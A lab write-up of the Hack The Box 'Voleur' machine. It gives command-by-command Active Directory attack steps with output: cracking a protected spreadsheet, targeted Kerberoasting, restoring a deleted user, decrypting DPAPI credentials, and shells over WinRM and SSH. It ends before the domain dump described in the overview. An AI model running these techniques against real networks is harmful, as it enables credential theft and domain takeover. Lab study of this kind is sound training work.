Overview

The machine starts by enumerating SMB shares with a Kerberos-only account to find a password-protected spreadsheet in the IT share, cracking it to leak a list of users and creds to get access as a service account with generic write over a deleted user object, restoring that user and targeted kerberoasting it to crack its ticket and get winrm, then finding DPAPI blobs on its profile to decrypt saved domain credentials for another account, whose winrm session reveals an SSH key for a WSL-backed service account that has full access to a mounted C drive containing an AD backup, dumping the NTDS.dit and SYSTEM/SECURITY hives to extract the Administrator hash and get shell as NT AUTHORITY\SYSTEM

As is common in real life Windows pentests, you will start the Voleur box with credentials for the following account: ryan.naylor / HollowOct31Nyt

Enumeration

start with nmap enumeration

it is an AD environment with DNS, Kerberos, RPC, SMB, LDAP, kpasswd , and SSH (unusual) so lets setup the environment

added hosts file with the FQDN name we found earlier, notice the Service Info shows that the Hostname is DC and we already know the domain which forms the FQDN hostname.domain.com

the krb5.conf file generation showed that the NTLM isn't supported so we'll need the clock-skew fixed cause we'll deal with Kerberos

bash
┌─[]─[10.10.16.206]─[jimmex@attacker]─[~/htb/labs/voleur]
└──╼ [★]$ sudo nxc smb 10.129.232.130 -u '' -p '' --generate-krb5-file /etc/krb5.conf
SMB 10.129.232.130 445 DC [*] x64 (name:DC) (domain:voleur.htb) (signing:True) (SMBv1:None) (NTLM:False)
SMB 10.129.232.130 445 DC [+] krb5 conf saved to: /etc/krb5.conf
SMB 10.129.232.130 445 DC [+] Run the following command to use the conf file: export KRB5_CONFIG=/etc/krb5.conf
SMB 10.129.232.130 445 DC [-] voleur.htb\: STATUS_NOT_SUPPORTED
┌─[]─[10.10.16.206]─[jimmex@attacker]─[~/htb/labs/voleur]
└──╼ [★]$ echo '10.129.232.130 DC voleur.htb DC.voleur.htb' | sudo tee -a /etc/hosts
10.129.232.130 DC voleur.htb DC.voleur.htb                                                                              ┌─[]─[10.10.16.206]─[jimmex@attacker]─[~/htb/labs/voleur]
└──╼ [★]$ sudo ntpdate voleur.htb
2026-06-21 23:38:55.667811 (-0700) +28799.660188 +/- 0.074943 voleur.htb 10.129.232.130 s1 no-leap
CLOCK: time stepped by 28799.660188

SMB

testing the valid creds just to show you it is an authentication method issue

bash
┌─[]─[10.10.16.206]─[jimmex@attacker]─[~/htb/labs/voleur]
└──╼ [★]$ nxc smb 10.129.232.130 -u ryan.naylor -p 'HollowOct31Nyt'
SMB 10.129.232.130 445 DC [*] x64 (name:DC) (domain:voleur.htb) (signing:True) (SMBv1:None) (NTLM:False)
SMB 10.129.232.130 445 DC [-] voleur.htb\ryan.naylor:HollowOct31Nyt STATUS_NOT_SUPPORTED

and as you can see with the -k option we can list shares normally

got read access over IT share

bash
┌─[]─[10.10.16.206]─[jimmex@attacker]─[~/htb/labs/voleur]
└──╼ [★]$ nxc smb 10.129.232.130 -u ryan.naylor -p 'HollowOct31Nyt' -k --shares
SMB 10.129.232.130 445 DC [*] x64 (name:DC) (domain:voleur.htb) (signing:True) (SMBv1:None) (NTLM:False)
SMB 10.129.232.130 445 DC [+] voleur.htb\ryan.naylor:HollowOct31Nyt
SMB 10.129.232.130 445 DC [*] Enumerated shares
SMB 10.129.232.130 445 DC Share Permissions Remark
SMB 10.129.232.130 445 DC ----- ----------- ------
SMB 10.129.232.130 445 DC ADMIN$ Remote Admin
SMB 10.129.232.130 445 DC C$ Default share
SMB 10.129.232.130 445 DC Finance
SMB 10.129.232.130 445 DC HR
SMB 10.129.232.130 445 DC IPC$ READ Remote IPC
SMB 10.129.232.130 445 DC IT READ
SMB 10.129.232.130 445 DC NETLOGON READ Logon server share
SMB 10.129.232.130 445 DC SYSVOL READ Logon server share

so lets generate a ticket to access the share

plaintext
┌─[]─[10.10.16.206]─[jimmex@attacker]─[~/htb/labs/voleur]
└──╼ [★]$ kinit ryan.naylor@VOLEUR.HTB
Password for ryan.naylor@VOLEUR.HTB:
┌─[]─[10.10.16.206]─[jimmex@attacker]─[~/htb/labs/voleur]
└──╼ [★]$ klist
Ticket cache: FILE:/tmp/krb5cc_1000
Default principal: ryan.naylor@VOLEUR.HTB

Valid starting     Expires            Service principal
06/21/26 23:46:16  06/22/26 09:46:16  krbtgt/VOLEUR.HTB@VOLEUR.HTB
        renew until 06/22/26 23:46:14

IT Share

found this file on the IT share so downloaded it

the file is access review sheet but it is password protected, tried the password we got for ryan but didn't work so lets try and crack it ss_20260621_235121.png

so we use office2john to extract the hash first

plaintext
┌─[]─[10.10.16.206]─[jimmex@attacker]─[~/htb/labs/voleur]
└──╼ [★]$ office2john Access_Review.xlsx  | tee sheet.hash
Access_Review.xlsx:$office$*2013*100000*256*16*a80811402788c037b50df976864b33f5*500bd7e833dffaa28772a49e987be35b*7ec993c47ef39a61e86f8273536decc7d525691345004092482f9fd59cfa111c

so passing it to hashcat cracked it → password for it is football

my version of hashcat is built from source which supports auto detection but if yours doesn't the mode for it is 9600 which you can specify using -m

the file mentions a lot of information (if none of it is valid at least we got a list of users) ss_20260621_235754.png

here is the information I could get out of it so lets validate as much creds as we can out of this

bash
jeremy.combs: NightT1meP1dg3on14 -- deleted account
svc_ldap: M1XyC9pW7qT5Vn
svc_iis: N5pXyW1VqM7CZ8
svc_backup: nopassword -- got something to do with jeremy
svc_winrm: nopassword -- got something to do with lacey

remote management users
Lacey.Miller
Todd.Wolfe
Jeremy.Combs

both Jeremy and the account related to it failed, we already know that Jeremy is deleted but just to be sure

bash
┌─[]─[10.10.16.206]─[jimmex@attacker]─[~/htb/labs/voleur]
└──╼ [★]$ nxc smb 10.129.232.130 -u jeremy.combs -p 'NightT1meP1dg3on14' -k
SMB 10.129.232.130 445 DC [*] x64 (name:DC) (domain:voleur.htb) (signing:True) (SMBv1:None) (NTLM:False)
SMB 10.129.232.130 445 DC [-] voleur.htb\jeremy.combs:NightT1meP1dg3on14 KDC_ERR_PREAUTH_FAILED
┌─[]─[10.10.16.206]─[jimmex@attacker]─[~/htb/labs/voleur]
└──╼ [★]$ nxc smb 10.129.232.130 -u svc_backup -p 'NightT1meP1dg3on14' -k
SMB 10.129.232.130 445 DC [*] x64 (name:DC) (domain:voleur.htb) (signing:True) (SMBv1:None) (NTLM:False)
SMB 10.129.232.130 445 DC [-] voleur.htb\svc_backup:NightT1meP1dg3on14 KDC_ERR_PREAUTH_FAILED

both service accounts are valid so there is nothing else we need to do for now (later on we can try some password spray if we hit a dead end or something)

bash
┌─[]─[10.10.16.206]─[jimmex@attacker]─[~/htb/labs/voleur]
└──╼ [★]$ nxc smb 10.129.232.130 -u svc_ldap -p 'M1XyC9pW7qT5Vn' -k
SMB 10.129.232.130 445 DC [*] x64 (name:DC) (domain:voleur.htb) (signing:True) (SMBv1:None) (NTLM:False)
SMB 10.129.232.130 445 DC [+] voleur.htb\svc_ldap:M1XyC9pW7qT5Vn
┌─[]─[10.10.16.206]─[jimmex@attacker]─[~/htb/labs/voleur]
└──╼ [★]$ nxc smb 10.129.232.130 -u svc_iis -p 'N5pXyW1VqM7CZ8' -k
SMB 10.129.232.130 445 DC [*] x64 (name:DC) (domain:voleur.htb) (signing:True) (SMBv1:None) (NTLM:False)
SMB 10.129.232.130 445 DC [+] voleur.htb\svc_iis:N5pXyW1VqM7CZ8

no additional shares readable by any of them

for now lest get bloodhound data somehow it worked without me specifying the -k so maybe the NTLM is disabled for some users only (sensitive users)? but if this is true why does nxc show NTLM: False even before the auth validation

so somehow nxc shows unsupported but rusthound just works, maybe it defaults back to kerberos but i don't think so

bash
┌─[]─[10.10.16.206]─[jimmex@attacker]─[~/htb/labs/voleur]
└──╼ [★]$ nxc smb 10.129.232.130 -u svc_ldap -p 'M1XyC9pW7qT5Vn'
SMB 10.129.232.130 445 DC [*] x64 (name:DC) (domain:voleur.htb) (signing:True) (SMBv1:None) (NTLM:False)
SMB 10.129.232.130 445 DC [-] voleur.htb\svc_ldap:M1XyC9pW7qT5Vn STATUS_NOT_SUPPORTED

it just uses simple_bind, there is something off about this box but lets move on for now

bash
┌─[]─[10.10.16.206]─[jimmex@attacker]─[~/htb/labs/voleur]
└──╼ [★]$ rusthound -d voleur.htb -i 10.129.232.130 -u svc_ldap -p M1XyC9pW7qT5Vn -z -vvv
---------------------------------------------------
Initializing RustHound at 00:09:40 on 06/22/26
Powered by g0h4n from OpenCyber
---------------------------------------------------

[2026-06-22T07:09:40Z INFO  rusthound] Verbosity level: Trace
[2026-06-22T07:09:40Z DEBUG rusthound::ldap] IP: 10.129.232.130
[2026-06-22T07:09:40Z DEBUG rusthound::ldap] PORT: not set
[2026-06-22T07:09:40Z DEBUG rusthound::ldap] FQDN: not set
[2026-06-22T07:09:40Z DEBUG rusthound::ldap] Url: ldap://10.129.232.130
[2026-06-22T07:09:40Z DEBUG rusthound::ldap] Domain: voleur.htb
[2026-06-22T07:09:40Z DEBUG rusthound::ldap] Username: svc_ldap@voleur.htb
[2026-06-22T07:09:40Z DEBUG rusthound::ldap] Email: svc_ldap@voleur.htb
[2026-06-22T07:09:40Z DEBUG rusthound::ldap] Password: M1XyC9pW7qT5Vn
[2026-06-22T07:09:40Z DEBUG rusthound::ldap] DC: ["DC=voleur,DC=htb"]
[2026-06-22T07:09:40Z DEBUG rusthound::ldap] ADCS: false
[2026-06-22T07:09:40Z DEBUG rusthound::ldap] Kerberos: false
[2026-06-22T07:09:40Z DEBUG rusthound::ldap] Trying to connect with simple_bind() function (username:password)
[2026-06-22T07:09:40Z INFO  rusthound::ldap] Connected to VOLEUR.HTB Active Directory!
[2026-06-22T07:09:40Z INFO  rusthound::ldap] Starting data collection...

ooh wait, we learned something new nxc uses NTLM challenge response by default without the -k option via SASL NTLM but because it is disabled it fails but ldap simple_bind doesn't necesseraely mean that it is using NTLM but it sends the raw password as is which isn't disabled ? maybe NTLM is disabled but kerberos isn't enforced

Shell as svc_winrm

looking at the data from bloodhound, got outbound controls

  1. we can writeSPN over SVC_WINRM meaning we can targetKerberoast it
  2. we are part of Restore_users group which gives us Generic Write over a user and an entire OU called Second-Line Support

so lets first try the targetedKerberoasating

first get a ticket cause the tool will need it

plaintext
┌─[]─[10.10.16.206]─[jimmex@attacker]─[~/htb/labs/voleur]
└──╼ [★]$ kinit svc_ldap@VOLEUR.HTB
Password for svc_ldap@VOLEUR.HTB:
┌─[]─[10.10.16.206]─[jimmex@attacker]─[~/htb/labs/voleur]
└──╼ [★]$ klist
Ticket cache: FILE:/tmp/krb5cc_1000
Default principal: svc_ldap@VOLEUR.HTB

Valid starting     Expires            Service principal
06/22/26 00:23:55  06/22/26 10:23:55  krbtgt/VOLEUR.HTB@VOLEUR.HTB
        renew until 06/23/26 00:23:50

then do the targeted kerberoasting, where it writes the SPN over the user with the access we have then it does the normal kerberoasting which will grab us the hash then i think it does cleanup afterwards so you don't have to worry about that

bash
┌─[]─[10.10.16.206]─[jimmex@attacker]─[~/htb/labs/voleur]
└──╼ [★]$ KRB5CCNAME=/tmp/krb5cc_1000 python3 /opt/scripts/targetedKerberoast/targetedKerberoast.py -u svc_ldap -p M1XyC9pW7qT5Vn -k --request-user svc_winrm -d voleur.htb --dc-host dc.voleur.htb
[*] Starting kerberoast attacks
[*] Attacking user (svc_winrm)
[+] Printing hash for (svc_winrm)
$krb5tgs$23$*svc_winrm$VOLEUR.HTB$voleur.htb/svc_winrm*$8b43ea8dbf9efa1663390cc7d63dd567$54bf2a587d94abe4f69c078128a0e980ffe994d1f33130ec6de4caf918840a0103db6aa2ce40abbc1a0bb4c329efb02d660a1e3fa9ebd9726e2e4a8df5ea1dec815bf0f36635d6ad8b2d667e5bef35e71ba4d18c5940ce2d9fee74a2d8cd863a3f52ac980adab65d71dbc1ff6e01c9369d82d18621a272755ab8f70ab368f397db60abba35249e45a2e4629e6cc9e26790a93274ba7dd740289401b9b70ceeecab79b57d80342f7afb810ce4c1d28e28e81bc0f9ad1ed26896b5e7a8601589307c4cd99571268e0343795eaf8f2305f610c16d86eb41ca96e6f78fe03e3c2ce2a3e638ec2bb13cdb8d6974177d2e35dcbec0739321ed229328c1372873a3956932b401de769368e7e9951be40cf328383903e1e9eda64da0e5036971d67006a42b8c2d1c14555e0a0ebe18409f3e5cdcc7baf90716eb6c9fd8e8e6321be94b1b2babf71a5aeb22dfd3806f55a890bcf7018e986102c7cbda1292dc8e719978e86ab85e7efd3a28f19c68ccf82eb7f45808dca8906b7024c68e51f8344e70f056eafe22b61a298890e188c93efe72c22d45738a018027c2108fab044362af2c003fd00d7b37093197972fae8dbb28fc05a5d04eae5000722dca8908416c3e72d03f913ea8754ea0342ce1aaf49b587961b10db3417b8487799f5f9ddfaea92963e4c5575ef09ae55bddeed7ecf3092ae3359d6dc64cbb1328795d8600e4b6804d22e02054b321e623a15fd8efee7cae4e2f8647946385f55baba9ae831d43aecd8e1ce052a42d134383b495df07d901ee9d1c923115868f336f0e95977c66fb80769a5bf598258b5330ad8aeb0453a0e71ef3966da28c1932b66ea64f2f7029875bfe33a95d2250e2abbaa747a865bb370c4907295f873e20a38f4580ed77768ad75ec542269b92e5e6869ac5b2b68f0674fbe8975e44e01e748f7b6d2704ef625ce423cec0a293dcca348a51338b704661d581b7b3c2debe04f5177bfe6af877c2ed4273f06b42f8db13b05c97fabe1b5d50d9af5e326e38bde9587c92192d2fcf28c61f9df24949443d10fb4db7110fa85fadb7a665150b244e7897eacc747b72905da449c8755d44efcd8759399a74952dd94796f85729bf74cb39509af10683a130d70916843f980154177220b6e49f138b3abaa43b781e0e24108df1a5a2232be632c2170573b6699e81ea547b35e1e5efec3d5859790f909d9ee52a462e8fe9c744cd565be76998e21bbee6f6ee2e2b5662d6cae0c073ed760fb0611d77cb6e8f42981a6712926406b6f9f11352112dcfb6d7fd11efd73c91cf2b3131e132988ee20832162f70cbfb7bfc92c1bdfd0968730e840c26d21ba4d009796e4b8071b04ce924d758c43ac47a30368006172ca777573808c3f8229b35603d99571bfae09571196fe4c5e2c1ae5daaf59a9de0ef3633d7548d0a3070f37e8d7fbea4e21515d0b0b77a9910aff7f2a72d32c5492d

cracking it got us the password for it

I won't even ask how this password got into rockyou list AFireInsidedeOzarctica980219afi, anyway this user ofcourse is member of remote management user which you might've guessed cause of the username so lets login

get a ticket again

plaintext
┌─[]─[10.10.16.206]─[jimmex@attacker]─[~/htb/labs/voleur]
└──╼ [★]$ kinit svc_winrm@VOLEUR.HTB
Password for svc_winrm@VOLEUR.HTB:
┌─[]─[10.10.16.206]─[jimmex@attacker]─[~/htb/labs/voleur]
└──╼ [★]$ klist
Ticket cache: FILE:/tmp/krb5cc_1000
Default principal: svc_winrm@VOLEUR.HTB

Valid starting     Expires            Service principal
06/22/26 00:33:34  06/22/26 10:33:34  krbtgt/VOLEUR.HTB@VOLEUR.HTB
        renew until 06/23/26 00:33:32

and we got user

bash
┌─[]─[10.10.16.206]─[jimmex@attacker]─[~/htb/labs/voleur]
└──╼ [★]$ KRB5CCNAME=/tmp/krb5cc_1000 winrmexec voleru.htb/svc_winrm:@dc.voleur.htb -k -no-pass
'prompt_toolkit' not installed, using built-in 'readline'
Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies

[*] '-target_ip' not specified, using dc.voleur.htb
[*] '-port' not specified, using 5985
[*] '-url' not specified, using http://dc.voleur.htb:5985/wsman
[*] using domain and username from ccache: VOLEUR.HTB\svc_winrm
[*] '-spn' not specified, using HTTP/dc.voleur.htb@VOLEUR.HTB
[*] '-dc-ip' not specified, using VOLEUR.HTB
[*] requesting TGS for HTTP/dc.voleur.htb@VOLEUR.HTB
PS C:\Users\svc_winrm\Documents> type ..\Desktop\user.txt
b677ab4d6871708ea93af42df8faeb08
PS C:\Users\svc_winrm\Documents>

the shell gives us nothing more than just an iterative enumeration using SharpHound which didn't get a lot of additional Information

so lets go back to the svc_ldap user again and look what are the writable objects using bloodyAD maybe the collector missed something and if we found something we can move on to abusing that GenericWrite Given to us By the Restore_users Group

and as you can see the user got write access over a deleted object so lets restore this and look at what it can do (I looked into that Lacey miller user and nothing special about it)

Todd.Wolfe Shares

using the powershell we got a list of all the deleted objects and turns out it is this todd wolfe user only and his lastKnownParent is the OU we got Generic Write over meaning we'll have generic write over that user after it is restored

bash
PS C:\Users\svc_winrm\Documents> $pass = ConvertTo-SecureString "M1XyC9pW7qT5Vn" -AsPlainText -Force
PS C:\Users\svc_winrm\Documents> $cred = New-Object System.Management.Automation.PSCredential("voleur.htb\svc_ldap", $pass)
PS C:\Users\svc_winrm\Documents> Get-ADObject -Filter 'isDeleted -eq $true' -IncludeDeletedObjects -Properties LastKnownParent -Credential $cred | Select-Object Name, ObjectClass, LastKnown
Parent, DistinguishedName | Format-List


Name : Deleted Objects
ObjectClass : container
LastKnownParent :
DistinguishedName : CN=Deleted Objects,DC=voleur,DC=htb

Name : Todd Wolfe
                    DEL:1c6b1deb-c372-4cbb-87b1-15031de169db
ObjectClass : user
LastKnownParent : OU=Second-Line Support Technicians,DC=voleur,DC=htb
DistinguishedName : CN=Todd Wolfe\0ADEL:1c6b1deb-c372-4cbb-87b1-15031de169db,CN=Deleted Objects,DC=voleur,DC=htb

so i restored it from the powershell and as you can see it is active as a user on the system again

bash
PS C:\Users\svc_winrm\Documents> Restore-ADObject 1c6b1deb-c372-4cbb-87b1-15031de169db -Credential $cred
PS C:\Users\svc_winrm\Documents> net users

User accounts for \\

-------------------------------------------------------------------------------
Administrator Guest jeremy.combs
krbtgt lacey.miller marie.bryant
ryan.naylor              svc_backup               svc_iis
svc_ldap svc_winrm todd.wolfe
The command completed with one or more errors.

PS C:\Users\svc_winrm\Documents>

now lets do the targeted Kerberoast against it again

bash
┌─[]─[10.10.16.102]─[jimmex@attacker]─[~/htb/labs/voleur]
└──╼ [★]$ KRB5CCNAME=/tmp/krb5cc_1000 python3 /opt/scripts/targetedKerberoast/targetedKerberoast.py -u svc_ldap -p M1XyC9pW7qT5Vn -k --request-user Todd.wolfe -d voleur.htb --dc-host dc.vol
eur.htb
[*] Starting kerberoast attacks
[*] Attacking user (Todd.wolfe)
[+] Printing hash for (todd.wolfe)
$krb5tgs$23$*todd.wolfe$VOLEUR.HTB$voleur.htb/todd.wolfe*$836e9a60c1a0ca4fcf82ee77e72ba073$87e8836bd157b6127f25fe3620ea6e519dbe45f130ca9f024eece76a3e9fdf32ea42b986fad4d778fdf7c67d48606839dc895a395b4f9be3337e46ab54875e55ae8c8c2aadc49e09a50d1e7bebc72ce584d6bc312c89e028b6de099bae17d314a8c791f5b416e6bfefc759208153fdbc0a989ec187e88881927b45f9bf5c67149e64a86fc761677929c738c25a32741e627bab70423c0ac9ab400d13bcf9a8fc53e820d6c0a26008de185cb7deef3f74219c55fd6b4038b54a9af906ad14f1805f6b715f399c61ecb0e3c9ad91439b0387ca8ca088e72fecf51eeff2a7717ecb2df9896b2cf7a49a184e9083b72061cf9ce1a3c2272f35f1ef1bbfb87bd0dc969b90158c4c214868a559e10df33e800f4f882d1fc45048d24b4b298fc601458340afa07cf3b88201d612ec0c538c7c5cfea1f0e12472ec51aad0d80b94c6d3a89e160d382080f22ef7f4ecd0cf7fa576345ed852849712f369b47e7c6b11597f807d4f35ee115a5ac0007850bd8af703a8742fa5d0166fd8bf48ce912f20f2544d73a3a1190855b04dbb46a0e2aaa4b665fcd8aa0ffdeb503f8fb356f346bcaadaf5f19e6614d5820ac96b2e811d3b48927d966bd8d6860b5f495abd4e04055558131d8f967ccb8c5b38ca90ec18110142a8a52367d3dc85ca0b6efd181d0fb1d7dae11f4a4c0d24794776a3afa209d77f7b5ec26c4106bb35f67ab3074bb760c7e3a462bdc6159ea9e3043a7a42519eefe8b1895fbc4401cf427dc8e08da8528b1e589e478812b48ca0b758eac5915c4b673fdf8ffb27afd0638e5453d7dde176971e7223bcde0f262f89bb90a35f1409e5fbe36bf2b4292a14f788e280b57b481abd4e8b79e55b2e73785897b7356705f4ae67d5fda8e0748cdfd26ede382ca5afd7cce5c224863c6eb06a10b71119e84b37c552af16e9232cb17a3aa5f5f4b21b9c128ec4024e5700e96312eccc0cef2f1514e8635b473050bf5c0c57260f40f818baa21e343eb7f8413abcfdade05d3f849658c349e52c0d05c1dc42a58f38928c02903ba2f58fb8cdfbe95b356a2d48cacf09ce3e644682f2e561de1bb8e88f6bac31871669cff8be9c9370208aa86187c2a19020714387c89235257d667b432b701b0383cfddc348a6453bbd3370fccd09e94905912243801a7a8359eb295dfb9cc265a0e7edecad53325307bf0ee1fbbd83cf45283da15e3ff3283babc2577e0a06c8a59e84a5af2cc280fde4a8a9c2763de2638947f164687933291b151c2ea4944a02fa1ee73197c9f065b459cc5ff708f1406fc5d3c0566837447f64dec853a49f334080165e328908d5959147f3242c1c4bfca2c2e8c22d0fa1bef329cc6026dfee63139981acbb298b6cb60f6e1b51bc3969c3771d6b921dfda59741b37b437acb492b0271d2100ea233ded09a62868b60886fa1729bded76a37facf9cdec4a1a51f9a1c77cf7af31fe751680a

trying to crack the password with the rockyou list didn't work but i remembered that deleted user that was mentioned in the sheet Jeremy.combs but when we looked at the deleted objects earlier it wasn't there and when i looked into the bloodhound data it was enabled account and working just fine

so i figured maybe that was a wrong username and the password given in the file was actually for todd so i grabbed all credentials we have so far in a file and tried to use them to crack and as you can see our initial thought was right, whoever wrote that user was deleted it mistook it for todd

using that user with smbclient we can list the IT share

and we got the dpapi creds here

plaintext
# ls
drw-rw-rw-          0  Wed Jan 29 07:13:09 2025 .
drw-rw-rw-          0  Wed Jan 29 07:13:09 2025 ..
drw-rw-rw-          0  Wed Jan 29 07:13:09 2025 Credentials
drw-rw-rw-          0  Wed Jan 29 07:13:09 2025 Crypto
drw-rw-rw-          0  Wed Jan 29 07:13:09 2025 Internet Explorer
drw-rw-rw-          0  Wed Jan 29 07:13:09 2025 Network
drw-rw-rw-          0  Wed Jan 29 07:13:09 2025 Protect
drw-rw-rw-          0  Wed Jan 29 07:13:09 2025 Spelling
drw-rw-rw-          0  Wed Jan 29 07:13:09 2025 SystemCertificates
drw-rw-rw-          0  Wed Jan 29 07:13:09 2025 Vault
drw-rw-rw-          0  Wed Jan 29 07:13:10 2025 Windows
#

download both of them

plaintext
# cd Credentials
# ls
drw-rw-rw-          0  Wed Jan 29 07:13:09 2025 .
drw-rw-rw-          0  Wed Jan 29 07:13:09 2025 ..
-rw-rw-rw-        398  Wed Jan 29 05:13:50 2025 772275FAD58525253490A9B0039791D3
# get 772275FAD58525253490A9B0039791D3
# cd ..
# cd Protect
# ls
drw-rw-rw-          0  Wed Jan 29 07:13:09 2025 .
drw-rw-rw-          0  Wed Jan 29 07:13:09 2025 ..
-rw-rw-rw-         24  Wed Jan 29 04:53:08 2025 CREDHIST
drw-rw-rw-          0  Wed Jan 29 07:13:09 2025 S-1-5-21-3927696377-1337352550-2781715495-1110
-rw-rw-rw-         76  Wed Jan 29 04:53:08 2025 SYNCHIST
# cd S-1-5-21-3927696377-1337352550-2781715495-1110
# ls
drw-rw-rw-          0  Wed Jan 29 07:13:09 2025 .
drw-rw-rw-          0  Wed Jan 29 07:13:09 2025 ..
-rw-rw-rw-        740  Wed Jan 29 05:09:25 2025 08949382-134f-4c63-b93c-ce52efc0aa88
-rw-rw-rw-        900  Wed Jan 29 04:53:08 2025 BK-VOLEUR
-rw-rw-rw-         24  Wed Jan 29 04:53:08 2025 Preferred
# get 08949382-134f-4c63-b93c-ce52efc0aa88
#

so first we'll decrypt the key

bash
┌─[]─[10.10.16.102]─[jimmex@attacker]─[~/htb/labs/voleur]
└──╼ [★]$ dpapi.py masterkey -file 08949382-134f-4c63-b93c-ce52efc0aa88 -password NightT1meP1dg3on14 -sid S-1-5-21-3927696377-1337352550-2781715495-1110
Impacket v0.14.0.dev0+20260407.172353.7fc084ad - Copyright Fortra, LLC and its affiliated companies

[MASTERKEYFILE]
Version : 2 (2)
Guid : 08949382-134f-4c63-b93c-ce52efc0aa88
Flags : 0 (0)
Policy : 0 (0)
MasterKeyLen: 00000088 (136)
BackupKeyLen: 00000068 (104)
CredHistLen : 00000000 (0)
DomainKeyLen: 00000174 (372)

Decrypted key with User Key (MD4 protected)
Decrypted key: 0xd2832547d1d5e0a01ef271ede2d299248d1cb0320061fd5355fea2907f9cf879d10c9f329c77c4fd0b9bf83a9e240ce2b8a9dfb92a0d15969ccae6f550650a83

Shell as Jeremy.Combs

and we got credentials for jeremy.combs

bash
┌─[]─[10.10.16.102]─[jimmex@attacker]─[~/htb/labs/voleur]
└──╼ [★]$ dpapi.py credential -file 772275FAD58525253490A9B0039791D3 -key 0xd2832547d1d5e0a01ef271ede2d299248d1cb0320061fd5355fea2907f9cf879d10c9f329c77c4fd0b9bf83a9e240ce2b8a9dfb92a0d15969ccae6f550650a83
Impacket v0.14.0.dev0+20260407.172353.7fc084ad - Copyright Fortra, LLC and its affiliated companies

[CREDENTIAL]
LastWritten : 2025-01-29 12:55:19+00:00
Flags : 0x00000030 (CRED_FLAGS_REQUIRE_CONFIRMATION|CRED_FLAGS_WILDCARD_MATCH)
Persist : 0x00000003 (CRED_PERSIST_ENTERPRISE)
Type : 0x00000002 (CRED_TYPE_DOMAIN_PASSWORD)
Target : Domain:target=Jezzas_Account
Description :
Unknown :
Username : jeremy.combs
Unknown : qT3V9pLXyN7W4m

this user is member of Remote Management users so lets get a shell

as always get a ticket first

plaintext
─[]─[10.10.16.102]─[jimmex@attacker]─[~/htb/labs/voleur]
└──╼ [★]$ kinit jeremy.combs@VOLEUR.HTB
Password for jeremy.combs@VOLEUR.HTB:
┌─[]─[10.10.16.102]─[jimmex@attacker]─[~/htb/labs/voleur]
└──╼ [★]$ klist
Ticket cache: FILE:todd.wolfe.ccache
Default principal: jeremy.combs@VOLEUR.HTB

Valid starting     Expires            Service principal
06/22/26 01:46:11  06/22/26 11:46:11  krbtgt/VOLEUR.HTB@VOLEUR.HTB
        renew until 06/23/26 01:46:08
┌─[]─[10.10.16.102]─[jimmex@attacke

no special privilege or anything

bash
┌─[]─[10.10.16.102]─[jimmex@attacker]─[~/htb/labs/voleur]
└──╼ [★]$ evil-winrm -i dc.voleur.htb -r voleur.htb

Evil-WinRM shell v3.5

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\jeremy.combs\Documents> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
*Evil-WinRM* PS C:\Users\jeremy.combs\Documents>

Shell as svc_backup

but there is a file called notes with an ssh key it looks like so lets download those and see what is in there

bash
*Evil-WinRM* PS C:\IT> dir


    Directory: C:\IT


Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 1/29/2025 1:40 AM First-Line Support
d----- 1/29/2025 7:13 AM Second-Line Support
d----- 1/30/2025 8:11 AM Third-Line Support


*Evil-WinRM* PS C:\IT> tree /f
Folder PATH listing
Volume serial number is A5C3-6454
C:.
+---First-Line Support
+---Second-Line Support
+---Third-Line Support
    ¦ id_rsa
    ¦ Note.txt.txt
    ¦
    +---Backups
*Evil-WinRM* PS C:\IT>

some one is yapping about windows backup so lets see what user related to that file and log in

plaintext
┌─[]─[10.10.16.102]─[jimmex@attacker]─[~/htb/labs/voleur]
└──╼ [★]$ cat Note.txt.txt
Jeremy,

I've had enough of Windows Backup! I've part configured WSL to see if we can utilize any of the backup tools from Linux.

Please see what you can set up.

Thanks,

Admin

it is the for the user svc_backup

bash
┌─[]─[10.10.16.102]─[jimmex@attacker]─[~/htb/labs/voleur]
└──╼ [★]$ chmod 600 id_rsa
┌─[]─[10.10.16.102]─[jimmex@attacker]─[~/htb/labs/voleur]
└──╼ [★]$ ssh-keygen -y -f id_rsa
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCoXI8y9RFb+pvJGV6YAzNo9W99Hsk0fOcvrEMc/ij+GpYjOfd1nro/ZpuwyBnLZdcZ/ak7QzXdSJ2IFoXd0s0vtjVJ5L8MyKwTjXXMfHoBAx6mPQwYGL9zVR+LutUyr5fo0mdva/mkLOmjKhs41aisFcwpX0OdtC6ZbFhcpDKvq+BKst3ckFbpM1lrc9ZOHL3CtNE56B1hqoKPOTc+xxy3ro+GZA/JaR5VsgZkCoQL951843OZmMxuft24nAgvlzrwwy4KL273UwDkUCKCc22C+9hWGr+kuSFwqSHV6JHTVPJSZ4dUmEFAvBXNwc11WT4Y743OHJE6q7GFppWNw7wvcow9g1RmX9zii/zQgbTiEC8BAgbI28A+4RcacsSIpFw2D6a8jr+wshxTmhCQ8kztcWV6NIod+Alw/VbcwwMBgqmQC5lMnBI/0hJVWWPhH+V9bXy0qKJe7KA4a52bcBtjrkKU7A/6xjv6tc5MDacneoTQnyAYSJLwMXM84XzQ4us= svc_backup@DC
┌─[]─[10.10.16.102]─[jimmex@attacker]─[~/htb/labs/voleur]
└──╼ [★]$

and as you can see we got in and this proves this is a WSL not powershell so lets enumerate what's there

and as you can see there is a mounted C

plaintext
svc_backup@DC:/$ cd /mnt/c
svc_backup@DC:/mnt/c$ ls
ls: cannot access 'DumpStack.log.tmp': Permission denied
ls: cannot access 'pagefile.sys': Permission denied
'$Recycle.Bin'   Config.Msi                DumpStack.log.tmp   HR   PerfLogs        'Program Files (x86)'   Recovery                     Users     inetpub
'$WinREAgent'   'Documents and Settings'   Finance             IT  'Program Files'   ProgramData           'System Volume Information'   Windows   pagefile.sys
svc_backup@DC:/mnt/c$

the empty backup directory on the user jeremy got files now and registry

plaintext
svc_backup@DC:/mnt/c/IT$ cd Third-Line\ Support/
svc_backup@DC:/mnt/c/IT/Third-Line Support$ ls
Backups  Note.txt.txt  id_rsa
